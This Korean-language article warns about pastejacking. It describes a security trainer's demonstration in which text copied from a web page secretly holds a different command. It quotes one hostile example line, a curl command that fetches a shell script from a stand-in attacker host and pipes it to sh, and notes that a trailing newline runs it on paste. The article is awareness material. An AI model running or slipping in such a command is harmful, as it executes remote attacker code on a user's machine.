속도가 모든 것이고 빠른 결과를 얻는 것이 중요한 시대에 살고 있는 것이 사실입니다. 그러나 실제로 잠시 멈추고 그 결과에 대해 생각하는 사람은 거의 없습니다.
매일 수백만 명의 프로그래머, 관리자 및 보안 연구원이 웹 페이지의 명령을 복사하여 PC의 콘솔에 직접 붙여넣는 것과 같은 간단한 작업을 수행합니다.
많은 사람들이 그것에 대해 생각조차 하지 않지만, 특히 중요하거나 중요한 데이터를 저장하는 경우 그 결과는 처음 생각하는 것보다 훨씬 심각하고 위험합니다.
잘 알려진 보안 전문가가 시간을 내어 웹 페이지에서 콘텐츠를 복사하여 붙여넣는 경우 실제로 어떤 일이 발생 하는지 공유 했습니다 .
복사 + 붙여넣기를 사용하면 해킹을 쉽게 얻을 수 있습니다.
Wizer 보안 교육 플랫폼의 설립자인 Gabriel Friedlander는 웹 페이지에서 명령을 복사하여 붙여넣기 전에 다시 한 번 생각하게 만드는 다이어그램의 표지를 벗었습니다.
오늘날 인터넷에서 콘텐츠를 복사하여 붙여넣는 일이 너무 흔해져서 아무도 그것에 대해 생각조차 하지 않습니다.
그러나 Friedlander는 일부 웹 페이지는 언뜻 보기에 보이는 것보다 더 기만적이며 복사했다고 생각하는 내용이 실제로 수행한 내용과 매우 다르다고 경고합니다.
그리고 최악의 경우, 필요한 지식이나 안내 없이 피해자는 텍스트를 삽입한 후에야 자신의 실수를 깨닫는데, 이때 너무 늦을 수 있습니다.
보안 분석가는 또한 블로그 독자들을 위한 간단한 퀴즈를 설계하여 사람들이 사이버 범죄자들에게 문호 개방을 꺼리는 것을 사람들이 실제로 이해할 수 있도록 했습니다.
복사할 명령을 제공했지만 텍스트를 붙여넣고 실제로 설정에 입력한 내용을 볼 때만 관련 진실이 드러납니다.
위의 스크린샷에 표시된 명령을 복사한 후 붙여넣기 결과는 복제한다고 생각한 것과는 거리가 멀기 때문에 충격을 받을 것입니다.
curl http://attacker-domain:8000/shell.sh | sh클립보드에 있는 완전히 다른 명령을 제외하고 끝에 있는 줄 바꿈(또는 반환) 문자는 위의 예제가 Linux 터미널에 직접 삽입되는 즉시 실행됨을 의미합니다.
따라서 실제로 무슨 일이 일어나고 있는지 파악하고 이를 심각한 보안 위협으로 간주하는 것이 좋습니다. 모든 웹사이트가 악성 콘텐츠를 숨긴다는 말은 아니지만 이를 고려해야 합니다.
터미널에 까다로운 명령을 삽입하여 해킹을 당한 적이 있습니까? 아래 의견 섹션에서 경험을 공유하십시오.
답글 남기기